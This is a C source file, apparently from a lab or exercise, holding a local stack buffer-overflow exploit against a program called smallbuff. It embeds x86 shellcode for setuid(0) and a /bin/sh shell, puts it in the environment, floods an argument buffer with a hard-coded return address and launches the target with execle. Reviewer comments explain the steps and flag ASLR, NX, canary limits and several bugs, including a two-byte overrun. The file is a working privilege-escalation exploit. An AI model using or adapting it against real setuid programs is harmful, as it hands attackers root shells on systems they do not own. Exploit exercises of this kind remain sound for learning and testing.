exploit2.c
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <stdio.h>
#define VULN "./smallbuff"
#define SIZE 160
// Raw machine-code bytes followed by the path string "/bin/sh".
// The repeated "\xcd\x80" pairs are the 32-bit x86 Linux `int 0x80`
// system-call instruction, so this is payload data, not text.
// main() passes this array as the only environment string of the target
// process (see env[] there).
// NOTE(review): looks like the widely published setuid(0) + execve("/bin/sh")
// sequence -- confirm by disassembling before relying on this description.
// NOTE(review): executing bytes placed in the environment presupposes an
// executable stack; a target built and run with a non-executable stack (NX)
// will fault instead of running them.
char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
// Runs VULN with a crafted first argument and a one-entry environment.
//
// The argument is the buffer p, filled with one repeated 32-bit value (addr).
// The environment holds only `shellcode`. addr is a hard-coded stack address
// minus the lengths of the shellcode and of the VULN path.
// NOTE(review): presumably addr is an estimate of where the environment string
// lands in the target's stack -- confirm against the target. The estimate only
// holds where stack addresses are fixed; with ASLR enabled the constant is a
// guess, and stack canaries or a non-executable stack in the target also break
// the approach.
//
// Returns 0 only when execle() fails, since execle() does not return on
// success. The failure itself is not reported.
int main(){
char p[SIZE]; // small buffer; holds only copies of the return address
char *env[] = {shellcode,NULL}; // environment for the target, terminated by a null pointer
char *vuln[] = {VULN,p,NULL}; // argv-style array: program path, then p, then the terminator
// NOTE(review): this `i` is never used; the for loop below declares its own.
int *ptr,i,addr;
// NOTE(review): 0xffffdff8 does not fit in a 32-bit int, so storing the result
// in `addr` relies on implementation-defined conversion.
addr = 0xffffdff8 - strlen(shellcode)-strlen(VULN);
fprintf(stderr,"[***] using address: %#010x\n",addr);
// Writes start two bytes into p.
// NOTE(review): p+2 is not guaranteed to be aligned for int; the cast and the
// stores through it are undefined behaviour in standard C.
ptr = (int*)(p+2);
// SIZE/4 = 40 stores. With a 4-byte int they cover p[2]..p[161], which is two
// bytes past the end of p[SIZE]. p is also never NUL-terminated, although it
// is handed to execle() as a string below.
for(int i=0;i<SIZE;i+=4){
*ptr++=addr;
}
// NOTE(review): the second argument (the target's argv[0]) is the address of
// the vuln array cast to char*, not vuln[0]; p becomes argv[1].
execle(vuln[0],(char*)vuln,p,NULL,env);
//int execle(const char *path, const char *arg,..., char * const envp[]);
// first parameter: the full path of the program
// env[] means the array of environment variables is what gets passed
return 0;
}